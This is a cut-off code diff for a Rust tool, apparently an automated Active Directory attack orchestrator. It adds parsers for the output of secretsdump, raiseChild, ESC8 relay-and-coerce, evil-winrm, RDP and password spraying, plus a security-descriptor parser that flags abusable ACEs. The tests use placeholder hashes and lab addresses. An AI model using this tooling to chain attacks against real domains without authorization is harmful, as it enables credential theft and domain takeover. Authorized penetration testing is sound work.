parse_smb_signing}; pub use spider::parse_spider_credentials; @@ -88,7 +90,11 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value "run_bloodhound" => { // BloodHound collection doesn't produce immediate discoveries } - "secretsdump" | "secretsdump_kerberos" => { + "secretsdump" | "secretsdump_kerberos" | "forge_inter_realm_and_dump" => { + // forge_inter_realm_and_dump runs ticketer + secretsdump in one + // call. The orchestrator passes `target_domain` so secretsdump + // hashes get attributed to the dumped (target/parent) realm, + // not the forging (source/child) realm. 
 let (hashes, creds) = parse_secretsdump(output, params); if !hashes.is_empty() { discoveries["hashes"] = Value::Array(hashes); @@ -97,6 +103,32 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } + "raise_child" => { + // raiseChild.py performs the parent-domain NTDS dump in standard + // secretsdump format (lines like "domain.local/user:RID:LM:NT:::" + // or "DOMAIN\\user:RID:..."). Derive parent FQDN from child_domain + // and pass as target_domain so bare-username lines and NetBIOS + // prefixes get attributed to the parent forest root. + let child_domain = params + .get("child_domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let parent_domain = child_domain + .split_once('.') + .map(|(_, rest)| rest) + .unwrap_or(child_domain); + let mut params_with_target = params.clone(); + if let Some(obj) = params_with_target.as_object_mut() { + obj.insert("target_domain".into(), json!(parent_domain)); + } + let (hashes, creds) = parse_secretsdump(output, &params_with_target); + if !hashes.is_empty() { + discoveries["hashes"] = Value::Array(hashes); + } + if !creds.is_empty() { + discoveries["credentials"] = Value::Array(creds); + } + } "kerberoast" => { let hashes = parse_kerberoast(output, params); if !hashes.is_empty() { @@ -177,7 +209,7 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } - "password_spray" => { + "password_spray" | "smb_login_check" => { let creds = parse_spray_success(output, params); if !creds.is_empty() { discoveries["credentials"] = Value::Array(creds); @@ -244,6 +276,145 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } + "ldap_acl_enumeration" => { + let vulns = parse_acl_enumeration(output, params); + if !vulns.is_empty() { + discoveries["vulnerabilities"] = Value::Array(vulns); + } + }
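The parent-realm attribution in the `raise_child` arm above hinges on one expression: `split_once('.')` drops the left-most DNS label of the child FQDN. A minimal standalone sketch of that derivation (the free function `parent_domain` is our illustration, not a name from the patch):

```rust
/// Derive the parent domain from a child FQDN by dropping the first DNS
/// label, mirroring the `raise_child` arm's `split_once('.')` logic.
/// Falls back to the input unchanged when there is no dot.
fn parent_domain(child_domain: &str) -> &str {
    child_domain
        .split_once('.')
        .map(|(_, rest)| rest)
        .unwrap_or(child_domain)
}

fn main() {
    // Typical child-to-forest-root case from the tests in this patch.
    assert_eq!(parent_domain("child.contoso.local"), "contoso.local");
    // Deeper nesting only strips one level per call.
    assert_eq!(parent_domain("grandchild.child.contoso.local"), "child.contoso.local");
    // Single-label input is returned unchanged.
    assert_eq!(parent_domain("CONTOSO"), "CONTOSO");
}
```

Note the implicit assumption: the input must actually be a child domain with at least three labels — applied to a forest root like `contoso.local` this derivation would yield `local`, so the orchestrator should only route genuine child realms through this path.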
+ "password_policy" => { + // Extract password policy details as a vulnerability/info finding. + // netexec smb --pass-pol output includes lockout threshold, min length, etc. + let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + if !output.is_empty() && !domain.is_empty() { + // Parse lockout threshold from the output + let lockout_threshold = output + .lines() + .find(|l| l.to_lowercase().contains("account lockout threshold")) + .and_then(|l| l.split(':').next_back().map(|s| s.trim().to_string())); + let min_length = output + .lines() + .find(|l| l.to_lowercase().contains("minimum password length")) + .and_then(|l| l.split(':').next_back().map(|s| s.trim().to_string())); + let mut details = serde_json::Map::new(); + details.insert("domain".into(), json!(domain)); + details.insert("target_ip".into(), json!(target)); + if let Some(ref lt) = lockout_threshold { + details.insert("lockout_threshold".into(), json!(lt)); + } + if let Some(ref ml) = min_length { + details.insert("min_password_length".into(), json!(ml)); + } + details.insert( + "description".into(), + json!(format!("Password policy enumerated for {domain}")), + ); + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("password_policy_{}", domain.replace('.', "_")), + "vuln_type": "password_policy", + "target": target, + "details": details, + }]); + } + } + "evil_winrm" => { + // Detect successful WinRM connection from evil-winrm output. + // A successful connection typically shows "Evil-WinRM shell" or + // output from executed commands (e.g., "whoami" returning a username). 
+ let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + if output.contains("Evil-WinRM") + || output.contains("\\") // whoami output like DOMAIN\user + || output.contains("PS >") + { + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("winrm_access_{}", target.replace('.', "_")), + "vuln_type": "winrm_access", + "target": target, + "details": { + "description": format!("WinRM access confirmed on {target}"), + "target_ip": target, + }, + }]); + } + } + "relay_and_coerce" => { + // Composite ESC8 tool prints `PFX_FILE=...` and `RELAYED_USER=...` + // markers when the cert is captured. Convert to a + // `certificate_obtained` vuln so `auto_certipy_auth` picks it up. + let pfx_path = output + .lines() + .find_map(|l| l.trim().strip_prefix("PFX_FILE=")) + .map(str::trim); + let relayed_user = output + .lines() + .find_map(|l| l.trim().strip_prefix("RELAYED_USER=")) + .map(str::trim); + + if let Some(pfx) = pfx_path { + // Cert is for the target DC's realm (the relayed identity's + // home), not the coercion credential's domain. Caller passes + // `target_domain` for cross-forest cases; fall back to + // `coerce_domain` for same-forest. 
+ let target_domain = params + .get("target_domain") + .and_then(|v| v.as_str()) + .or_else(|| params.get("coerce_domain").and_then(|v| v.as_str())) + .unwrap_or(""); + let coerce_target = params + .get("coerce_target") + .and_then(|v| v.as_str()) + .or_else(|| params.get("target_dc").and_then(|v| v.as_str())) + .unwrap_or(""); + let user = relayed_user.unwrap_or(""); + let mut details = serde_json::Map::new(); + details.insert("pfx_path".into(), json!(pfx)); + if !target_domain.is_empty() { + details.insert("domain".into(), json!(target_domain)); + } + if !user.is_empty() { + details.insert("target_user".into(), json!(user)); + details.insert("account_name".into(), json!(user)); + } + if !coerce_target.is_empty() { + details.insert("target_ip".into(), json!(coerce_target)); + } + details.insert("source".into(), json!("relay_and_coerce")); + details.insert( + "description".into(), + json!(format!( + "ESC8 relay captured certificate for {user} in {target_domain}" + )), + ); + let user_safe = user.replace(['$', '.'], "_"); + let domain_safe = target_domain.replace('.', "_"); + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("certificate_obtained_{user_safe}_{domain_safe}"), + "vuln_type": "certificate_obtained", + "target": coerce_target, + "details": details, + }]); + } + } + "xfreerdp" => { + // Detect successful RDP authentication from xfreerdp output. 
+ let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + // xfreerdp success: shows "Authentication only" or specific success patterns + let success = output.contains("Authentication only, exit status 0") + || (output.contains("connected to") && !output.contains("ERRCONNECT")) + || output.contains("FREERDP_CB_SESSION_STARTED"); + if success { + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("rdp_access_{}", target.replace('.', "_")), + "vuln_type": "rdp_access", + "target": target, + "details": { + "description": format!("RDP access confirmed on {target}"), + "target_ip": target, + }, + }]); + } + } _ => {} } @@ -626,6 +797,28 @@ SMB 192.168.58.121 445 DC01 bob 2026-03-25 23:21:09 0 Bob"#; assert!(!disc["hashes"].as_array().unwrap().is_empty()); } + #[test] + fn parse_tool_output_raise_child_attributes_to_parent() { + // raise_child dumps the parent NTDS in slash-separated FQDN format. + // Parser must derive parent_domain from child_domain and attribute hashes there. 
+        let output = "\
+[*] Forest is contoso.local
+contoso.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
+contoso.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::";
+        let params = json!({
+            "child_domain": "child.contoso.local",
+            "username": "testuser",
+            "password": "REDACTED",
+        });
+        let disc = parse_tool_output("raise_child", output, &params);
+        let hashes = disc["hashes"].as_array().expect("hashes array");
+        assert_eq!(hashes.len(), 2);
+        assert_eq!(hashes[0]["username"], "krbtgt");
+        assert_eq!(hashes[0]["domain"], "contoso.local");
+        assert_eq!(hashes[1]["username"], "Administrator");
+        assert_eq!(hashes[1]["domain"], "contoso.local");
+    }
+
     #[test]
     fn parse_tool_output_kerberoast() {
         let output = "$krb5tgs$23$*svc_sql$CONTOSO$contoso.local/svc_sql*$abc";
@@ -711,6 +904,75 @@ SMB 192.168.58.121 445 DC01 bob 2026-03-25 23:21:09 0 Bob"#;
         assert_eq!(td.len(), 1, "Duplicate trusted domains should be deduped");
     }
 
+    #[test]
+    fn parse_tool_output_relay_and_coerce_emits_cert_vuln() {
+        let output = "RELAY_PID=1234\n\
+            === Coercing via MS-DFSNM ===\n\
+            CERT_CAPTURED_VIA=MS-DFSNM\n\
+            PFX_FILE=/tmp/ares_relay_999/DC01$.pfx\n\
+            RELAYED_USER=DC01$\n\
+            === RELAY LOG ===\n\
+            [*] Servers started\n";
+        let params = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "target_domain": "contoso.local",
+            "coerce_domain": "child.contoso.local",
+        });
+        let disc = parse_tool_output("relay_and_coerce", output, &params);
+        let vulns = disc["vulnerabilities"].as_array().expect("vulns array");
+        assert_eq!(vulns.len(), 1);
+        assert_eq!(vulns[0]["vuln_type"], "certificate_obtained");
+        assert_eq!(
+            vulns[0]["details"]["pfx_path"],
+            "/tmp/ares_relay_999/DC01$.pfx"
+        );
+        assert_eq!(vulns[0]["details"]["domain"], "contoso.local");
+        assert_eq!(vulns[0]["details"]["target_user"], "DC01$");
+        assert_eq!(vulns[0]["target"], "192.168.58.20");
+    }
+
+    #[test]
+    fn parse_tool_output_relay_and_coerce_no_capture_no_vuln() {
+        let output = "RELAY_PID=1234\n\
+            === Coercing via MS-DFSNM ===\n\
+            === Coercing via MS-EFSR ===\n\
+            === Coercing via MS-RPRN ===\n\
+            === RELAY LOG ===\n\
+            [*] Servers started\n";
+        let params = json!({"ca_host": "192.168.58.10", "coerce_target": "192.168.58.20"});
+        let disc = parse_tool_output("relay_and_coerce", output, &params);
+        assert!(disc.get("vulnerabilities").is_none());
+    }
+
+    #[test]
+    fn parse_tool_output_relay_and_coerce_falls_back_to_coerce_domain() {
+        // Same-forest case: only coerce_domain present.
+        let output = "PFX_FILE=/tmp/ares_relay_1/dc01$.pfx\nRELAYED_USER=dc01$\n";
+        let params = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "coerce_domain": "contoso.local",
+        });
+        let disc = parse_tool_output("relay_and_coerce", output, &params);
+        let vulns = disc["vulnerabilities"].as_array().unwrap();
+        assert_eq!(vulns[0]["details"]["domain"], "contoso.local");
+    }
+
+    #[test]
+    fn parse_tool_output_relay_and_coerce_legacy_target_dc_alias() {
+        // Backwards-compat: orchestrator state may still emit `target_dc`.
+        let output = "PFX_FILE=/tmp/ares_relay_2/dc01$.pfx\nRELAYED_USER=dc01$\n";
+        let params = json!({
+            "ca_host": "192.168.58.10",
+            "target_dc": "192.168.58.20",
+            "coerce_domain": "contoso.local",
+        });
+        let disc = parse_tool_output("relay_and_coerce", output, &params);
+        let vulns = disc["vulnerabilities"].as_array().unwrap();
+        assert_eq!(vulns[0]["target"], "192.168.58.20");
+    }
+
     #[test]
     fn parse_tool_output_smb_signing_check() {
         let output = "SMB 192.168.58.10 445 DC01 signing:True";
diff --git a/ares-tools/src/parsers/ntsd.rs b/ares-tools/src/parsers/ntsd.rs
new file mode 100644
index 00000000..8f5d527b
--- /dev/null
+++ b/ares-tools/src/parsers/ntsd.rs
@@ -0,0 +1,759 @@
+//! nTSecurityDescriptor binary parser.
+//!
+//! Parses Windows SECURITY_DESCRIPTOR binary data (self-relative format) from
+//! 
LDAP nTSecurityDescriptor attribute values to extract DACL ACE entries.
+//! Identifies dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, etc.)
+//! and returns them as structured vulnerability discoveries.
+
+use serde_json::{json, Value};
+
+// ── Well-known SID prefixes ────────────────────────────────────────────────
+
+/// Map well-known SIDs to friendly names.
+fn well_known_sid(sid: &str) -> Option<&'static str> {
+    match sid {
+        "S-1-0-0" => Some("Nobody"),
+        "S-1-1-0" => Some("Everyone"),
+        "S-1-5-7" => Some("ANONYMOUS LOGON"),
+        "S-1-5-10" => Some("SELF"),
+        "S-1-5-11" => Some("Authenticated Users"),
+        "S-1-5-18" => Some("SYSTEM"),
+        "S-1-5-32-544" => Some("BUILTIN\\Administrators"),
+        "S-1-5-32-545" => Some("BUILTIN\\Users"),
+        _ => None,
+    }
+}
+
+// ── Access mask flags ──────────────────────────────────────────────────────
+
+const GENERIC_ALL: u32 = 0x10000000;
+const GENERIC_WRITE: u32 = 0x40000000;
+const ADS_RIGHT_DS_CONTROL_ACCESS: u32 = 0x00000100;
+const ADS_RIGHT_DS_WRITE_PROP: u32 = 0x00000020;
+const ADS_RIGHT_DS_SELF: u32 = 0x00000008;
+const WRITE_DACL: u32 = 0x00040000;
+const WRITE_OWNER: u32 = 0x00080000;
+const FULL_CONTROL: u32 = 0x000F01FF;
+
+// ── Object type GUIDs for extended rights ──────────────────────────────────
+
+/// User-Force-Change-Password (Reset Password extended right)
+const GUID_FORCE_CHANGE_PASSWORD: &str = "00299570-246d-11d0-a768-00aa006e0529";
+/// Self-Membership (validated write to group member attribute)
+const GUID_SELF_MEMBERSHIP: &str = "bf9679c0-0de6-11d0-a285-00aa003049e2";
+/// Write-Member (write to member attribute on group)
+const GUID_WRITE_MEMBER: &str = "bf9679a8-0de6-11d0-a285-00aa003049e2";
+/// All Extended Rights
+#[allow(dead_code)]
+const GUID_ALL_EXTENDED_RIGHTS: &str = "00000000-0000-0000-0000-000000000000";
+
+// ── Binary parsing helpers ─────────────────────────────────────────────────
+
+fn read_u8(data: &[u8], offset: usize) -> Option<u8> {
+    data.get(offset).copied()
+}
+
+fn read_u16_le(data: &[u8], offset: usize) -> Option<u16> {
+    if offset + 2 > data.len() {
+        return None;
+    }
+    Some(u16::from_le_bytes([data[offset], data[offset + 1]]))
+}
+
+fn read_u32_le(data: &[u8], offset: usize) -> Option<u32> {
+    if offset + 4 > data.len() {
+        return None;
+    }
+    Some(u32::from_le_bytes([
+        data[offset],
+        data[offset + 1],
+        data[offset + 2],
+        data[offset + 3],
+    ]))
+}
+
+/// Parse a SID from binary data at the given offset.
+/// Returns (sid_string, bytes_consumed).
+fn parse_sid(data: &[u8], offset: usize) -> Option<(String, usize)> {
+    let revision = read_u8(data, offset)?;
+    let sub_authority_count = read_u8(data, offset + 1)? as usize;
+
+    if offset + 8 + sub_authority_count * 4 > data.len() {
+        return None;
+    }
+
+    // IdentifierAuthority is 6 bytes big-endian
+    let auth_bytes = &data[offset + 2..offset + 8];
+    let authority = if auth_bytes[0] == 0 && auth_bytes[1] == 0 {
+        // Fits in a u32 — use the last 4 bytes
+        u32::from_be_bytes([auth_bytes[2], auth_bytes[3], auth_bytes[4], auth_bytes[5]]) as u64
+    } else {
+        // Full 48-bit authority
+        ((auth_bytes[0] as u64) << 40)
+            | ((auth_bytes[1] as u64) << 32)
+            | ((auth_bytes[2] as u64) << 24)
+            | ((auth_bytes[3] as u64) << 16)
+            | ((auth_bytes[4] as u64) << 8)
+            | (auth_bytes[5] as u64)
+    };
+
+    let mut sid = format!("S-{revision}-{authority}");
+    for i in 0..sub_authority_count {
+        let sub_auth = read_u32_le(data, offset + 8 + i * 4)?;
+        sid.push_str(&format!("-{sub_auth}"));
+    }
+
+    let consumed = 8 + sub_authority_count * 4;
+    Some((sid, consumed))
+}
+
+/// Parse a GUID from 16 bytes in mixed-endian format (as stored in AD).
+fn parse_guid(data: &[u8], offset: usize) -> Option<String> {
+    if offset + 16 > data.len() {
+        return None;
+    }
+    let d1 = read_u32_le(data, offset)?;
+    let d2 = read_u16_le(data, offset + 4)?;
+    let d3 = read_u16_le(data, offset + 6)?;
+    let d4 = &data[offset + 8..offset + 16];
+    Some(format!(
+        "{:08x}-{:04x}-{:04x}-{:02x}{:02x}-{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}",
+        d1, d2, d3, d4[0], d4[1], d4[2], d4[3], d4[4], d4[5], d4[6], d4[7]
+    ))
+}
+
+// ── ACE types ──────────────────────────────────────────────────────────────
+
+const ACCESS_ALLOWED_ACE_TYPE: u8 = 0x00;
+const ACCESS_ALLOWED_OBJECT_ACE_TYPE: u8 = 0x05;
+
+/// A parsed ACE with the information we care about.
+#[derive(Debug)]
+struct ParsedAce {
+    trustee_sid: String,
+    access_mask: u32,
+    object_type_guid: Option<String>,
+}
+
+/// Classify an ACE into a vulnerability type name, if it's dangerous.
+fn classify_ace(ace: &ParsedAce) -> Vec<&'static str> {
+    let mask = ace.access_mask;
+    let mut types = Vec::new();
+
+    // GenericAll — full control
+    if mask & GENERIC_ALL != 0 || mask == FULL_CONTROL {
+        types.push("genericall");
+        return types; // GenericAll subsumes everything
+    }
+
+    // GenericWrite
+    if mask & GENERIC_WRITE != 0 {
+        types.push("genericwrite");
+    }
+
+    // WriteDacl
+    if mask & WRITE_DACL != 0 {
+        types.push("writedacl");
+    }
+
+    // WriteOwner
+    if mask & WRITE_OWNER != 0 {
+        types.push("writeowner");
+    }
+
+    // Object-type specific rights
+    if let Some(ref guid) = ace.object_type_guid {
+        let guid_lower = guid.to_lowercase();
+        if guid_lower == GUID_FORCE_CHANGE_PASSWORD && (mask & ADS_RIGHT_DS_CONTROL_ACCESS != 0) {
+            types.push("forcechangepassword");
+        }
+        if guid_lower == GUID_SELF_MEMBERSHIP && (mask & ADS_RIGHT_DS_SELF != 0) {
+            types.push("self_membership");
+        }
+        if guid_lower == GUID_WRITE_MEMBER && (mask & ADS_RIGHT_DS_WRITE_PROP != 0) {
+            types.push("write_membership");
+        }
+    }
+
+    // AllExtendedRights (no object type restriction or null GUID)
+    if mask & ADS_RIGHT_DS_CONTROL_ACCESS != 
0 && ace.object_type_guid.is_none() { + types.push("allextendedrights"); + } + + // WriteProperty with no specific object type + if mask & ADS_RIGHT_DS_WRITE_PROP != 0 { + if let Some(ref guid) = ace.object_type_guid { + if guid.to_lowercase() != GUID_WRITE_MEMBER { + types.push("writeproperty"); + } + } else { + types.push("writeproperty"); + } + } + + types +} + +/// Parse a single ACE from binary data. +/// Returns (ParsedAce, total_ace_size). +fn parse_ace(data: &[u8], offset: usize) -> Option<(ParsedAce, usize)> { + let ace_type = read_u8(data, offset)?; + let _ace_flags = read_u8(data, offset + 1)?; + let ace_size = read_u16_le(data, offset + 2)? as usize; + + if offset + ace_size > data.len() || ace_size < 8 { + return None; + } + + match ace_type { + ACCESS_ALLOWED_ACE_TYPE => { + let access_mask = read_u32_le(data, offset + 4)?; + let (sid, _) = parse_sid(data, offset + 8)?; + Some(( + ParsedAce { + trustee_sid: sid, + access_mask, + object_type_guid: None, + }, + ace_size, + )) + } + ACCESS_ALLOWED_OBJECT_ACE_TYPE => { + let access_mask = read_u32_le(data, offset + 4)?; + let flags = read_u32_le(data, offset + 8)?; + + let mut guid_offset = offset + 12; + let object_type_guid = if flags & 0x01 != 0 { + let guid = parse_guid(data, guid_offset)?; + guid_offset += 16; + Some(guid) + } else { + None + }; + + // Skip InheritedObjectType if present + if flags & 0x02 != 0 { + guid_offset += 16; + } + + let (sid, _) = parse_sid(data, guid_offset)?; + Some(( + ParsedAce { + trustee_sid: sid, + access_mask, + object_type_guid, + }, + ace_size, + )) + } + _ => { + // Skip unknown ACE types + Some(( + ParsedAce { + trustee_sid: String::new(), + access_mask: 0, + object_type_guid: None, + }, + ace_size, + )) + } + } +} + +/// Parse a SECURITY_DESCRIPTOR in self-relative format and extract DACL ACEs. +/// +/// Returns a list of (trustee_sid, vuln_type) pairs for dangerous ACEs. 
+pub fn parse_security_descriptor(data: &[u8]) -> Vec<(String, String)> {
+    if data.len() < 20 {
+        return Vec::new();
+    }
+
+    let _revision = read_u8(data, 0);
+    let _sbz1 = read_u8(data, 1);
+    let control = read_u16_le(data, 2).unwrap_or(0);
+
+    // Check SE_DACL_PRESENT (bit 2)
+    if control & 0x0004 == 0 {
+        return Vec::new();
+    }
+
+    // SE_SELF_RELATIVE check (bit 15) — we only handle self-relative
+    if control & 0x8000 == 0 {
+        return Vec::new();
+    }
+
+    let dacl_offset = read_u32_le(data, 16).unwrap_or(0) as usize;
+    if dacl_offset == 0 || dacl_offset >= data.len() {
+        return Vec::new();
+    }
+
+    // DACL header: Revision(1) + Sbz1(1) + AclSize(2) + AceCount(2) + Sbz2(2)
+    if dacl_offset + 8 > data.len() {
+        return Vec::new();
+    }
+
+    let ace_count = read_u16_le(data, dacl_offset + 4).unwrap_or(0) as usize;
+
+    let mut results = Vec::new();
+    let mut ace_offset = dacl_offset + 8; // skip ACL header
+
+    for _ in 0..ace_count {
+        if ace_offset >= data.len() {
+            break;
+        }
+        match parse_ace(data, ace_offset) {
+            Some((ace, size)) => {
+                if !ace.trustee_sid.is_empty() {
+                    for vuln_type in classify_ace(&ace) {
+                        results.push((ace.trustee_sid.clone(), vuln_type.to_string()));
+                    }
+                }
+                ace_offset += size;
+            }
+            None => break,
+        }
+    }
+
+    results
+}
+
+/// Parse ldapsearch output containing base64-encoded nTSecurityDescriptor values.
+///
+/// Expects output in ldapsearch format:
+/// ```text
+/// dn: CN=someuser,DC=contoso,DC=local
+/// sAMAccountName: someuser
+/// nTSecurityDescriptor:: <base64>
+/// ```
+///
+/// Returns vulnerability discoveries as JSON values.
+pub fn parse_acl_enumeration(output: &str, params: &Value) -> Vec<Value> {
+    use std::collections::HashMap;
+
+    let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or("");
+    let target_ip = params
+        .get("target")
+        .or_else(|| params.get("target_ip"))
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+
+    // Build a SID → sAMAccountName map from the output itself
+    let mut sid_to_name: HashMap<String, String> = HashMap::new();
+    let mut vulns = Vec::new();
+
+    // First pass: collect all objects with their sAMAccountName and objectSid
+    struct LdapObject {
+        sam_account_name: String,
+        object_class: String, // user, group, computer
+        ntsd_base64: String,
+        object_sid: String,
+    }
+
+    let mut objects: Vec<LdapObject> = Vec::new();
+    let mut current = LdapObject {
+        sam_account_name: String::new(),
+        object_class: String::new(),
+        ntsd_base64: String::new(),
+        object_sid: String::new(),
+    };
+    let mut in_ntsd = false;
+    let mut ntsd_buf = String::new();
+
+    for line in output.lines() {
+        let line = line.trim_end();
+
+        if line.starts_with("dn: ") || (line.is_empty() && !current.sam_account_name.is_empty()) {
+            // Flush current
+            if in_ntsd {
+                current.ntsd_base64 = ntsd_buf.clone();
+                in_ntsd = false;
+                ntsd_buf.clear();
+            }
+            if !current.sam_account_name.is_empty() {
+                objects.push(current);
+            }
+            current = LdapObject {
+                sam_account_name: String::new(),
+                object_class: String::new(),
+                ntsd_base64: String::new(),
+                object_sid: String::new(),
+            };
+            continue;
+        }
+
+        // Handle base64 continuation lines (start with space)
+        if in_ntsd {
+            if line.starts_with(' ') {
+                ntsd_buf.push_str(line.trim());
+                continue;
+            } else {
+                current.ntsd_base64 = ntsd_buf.clone();
+                in_ntsd = false;
+                ntsd_buf.clear();
+            }
+        }
+
+        if let Some(val) = line.strip_prefix("sAMAccountName: ") {
+            current.sam_account_name = val.trim().to_string();
+        } else if let Some(val) = line.strip_prefix("objectClass: ") {
+            let val = val.trim().to_lowercase();
+            // Keep the most specific class
+            if val == "user" || val == 
"computer" || val == "group" { + current.object_class = val; + } + } else if let Some(val) = line.strip_prefix("objectSid:: ") { + // Base64-encoded SID + if let Ok(bytes) = base64_decode(val.trim()) { + if let Some((sid, _)) = parse_sid(&bytes, 0) { + current.object_sid = sid; + } + } + } else if let Some(val) = line.strip_prefix("objectSid: ") { + // String SID + current.object_sid = val.trim().to_string(); + } else if let Some(val) = line.strip_prefix("nTSecurityDescriptor:: ") { + ntsd_buf = val.trim().to_string(); + in_ntsd = true; + } else if let Some(val) = line.strip_prefix("nTSecurityDescriptor: ") { + // Non-base64 (shouldn't happen but handle it) + current.ntsd_base64 = val.trim().to_string(); + } + } + // Flush last object + if in_ntsd { + current.ntsd_base64 = ntsd_buf; + } + if !current.sam_account_name.is_empty() { + objects.push(current); + } + + // Build SID map + for obj in &objects { + if !obj.object_sid.is_empty() && !obj.sam_account_name.is_empty() { + sid_to_name.insert(obj.object_sid.clone(), obj.sam_account_name.clone()); + } + } + + // Second pass: parse each nTSecurityDescriptor and extract dangerous ACEs + for obj in &objects { + if obj.ntsd_base64.is_empty() { + continue; + } + + let sd_bytes = match base64_decode(&obj.ntsd_base64) { + Ok(b) => b, + Err(_) => continue, + }; + + let aces = parse_security_descriptor(&sd_bytes); + for (trustee_sid, vuln_type) in &aces { + // Resolve trustee SID to name + let source_name = sid_to_name + .get(trustee_sid) + .map(|s| s.as_str()) + .or_else(|| well_known_sid(trustee_sid)) + .unwrap_or(trustee_sid); + + // Skip well-known system SIDs and high-privilege groups that aren't + // actionable (you'd already need DA to abuse them). 
+ let source_lower = source_name.to_lowercase(); + if matches!( + source_name, + "SYSTEM" + | "BUILTIN\\Administrators" + | "BUILTIN\\Users" + | "SELF" + | "Nobody" + | "ANONYMOUS LOGON" + ) || source_lower == "administrators" + || source_lower == "domain admins" + || source_lower == "enterprise admins" + || source_lower == "key admins" + || source_lower == "enterprise key admins" + || source_lower == "account operators" + || source_lower == "domain controllers" + || source_lower == "enterprise domain controllers" + { + continue; + } + + // Skip if source == target (self-permissions) + if source_name.eq_ignore_ascii_case(&obj.sam_account_name) { + continue; + } + + let target_type = match obj.object_class.as_str() { + "user" => "User", + "group" => "Group", + "computer" => "Computer", + _ => "Unknown", + }; + + let vuln_id = format!( + "acl_{}_{}_{}", + vuln_type, + source_name.to_lowercase().replace(' ', "_"), + obj.sam_account_name.to_lowercase().replace('$', "") + ); + + vulns.push(json!({ + "vuln_id": vuln_id, + "vuln_type": vuln_type, + "source": source_name, + "target": obj.sam_account_name, + "target_type": target_type, + "target_ip": target_ip, + "domain": domain, + "source_domain": domain, + "details": { + "trustee_sid": trustee_sid, + "source": source_name, + "target": obj.sam_account_name, + "target_type": target_type, + "domain": domain, + "source_domain": domain, + "description": format!( + "{} has {} on {} ({})", + source_name, vuln_type, obj.sam_account_name, target_type + ), + }, + })); + } + } + + vulns +} + +/// Simple base64 decoder (no external dependency). 
+fn base64_decode(input: &str) -> Result<Vec<u8>, &'static str> {
+    // Strip whitespace
+    let clean: String = input.chars().filter(|c| !c.is_whitespace()).collect();
+    if clean.is_empty() {
+        return Ok(Vec::new());
+    }
+
+    let mut output = Vec::with_capacity(clean.len() * 3 / 4);
+    let mut buf: u32 = 0;
+    let mut bits: u32 = 0;
+
+    for ch in clean.chars() {
+        let val = match ch {
+            'A'..='Z' => ch as u32 - 'A' as u32,
+            'a'..='z' => ch as u32 - 'a' as u32 + 26,
+            '0'..='9' => ch as u32 - '0' as u32 + 52,
+            '+' => 62,
+            '/' => 63,
+            '=' => continue, // padding
+            _ => return Err("invalid base64 character"),
+        };
+        buf = (buf << 6) | val;
+        bits += 6;
+        if bits >= 8 {
+            bits -= 8;
+            output.push((buf >> bits) as u8);
+            buf &= (1 << bits) - 1;
+        }
+    }
+
+    Ok(output)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn parse_sid_wellknown() {
+        // S-1-5-18 (SYSTEM): revision=1, subauth_count=1, authority=5, subauth=18
+        let bytes = [
+            0x01, // revision
+            0x01, // sub authority count
+            0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // authority = 5
+            0x12, 0x00, 0x00, 0x00, // sub authority = 18
+        ];
+        let (sid, consumed) = parse_sid(&bytes, 0).unwrap();
+        assert_eq!(sid, "S-1-5-18");
+        assert_eq!(consumed, 12);
+    }
+
+    #[test]
+    fn parse_sid_domain_user() {
+        // S-1-5-21-xxx-xxx-xxx-1001
+        let bytes = [
+            0x01, // revision
+            0x04, // sub authority count = 4
+            0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // authority = 5
+            0x15, 0x00, 0x00, 0x00, // 21
+            0x01, 0x00, 0x00, 0x00, // 1
+            0x02, 0x00, 0x00, 0x00, // 2
+            0xE9, 0x03, 0x00, 0x00, // 1001
+        ];
+        let (sid, _) = parse_sid(&bytes, 0).unwrap();
+        assert_eq!(sid, "S-1-5-21-1-2-1001");
+    }
+
+    #[test]
+    fn parse_guid_format() {
+        // A known GUID: 00299570-246d-11d0-a768-00aa006e0529
+        let bytes = [
+            0x70, 0x95, 0x29, 0x00, // d1 = 0x00299570 LE
+            0x6d, 0x24, // d2 = 0x246d LE
+            0xd0, 0x11, // d3 = 0x11d0 LE
+            0xa7, 0x68, 0x00, 0xaa, 0x00, 0x6e, 0x05, 0x29, // d4
+        ];
+        let guid = parse_guid(&bytes, 0).unwrap();
+        assert_eq!(guid, 
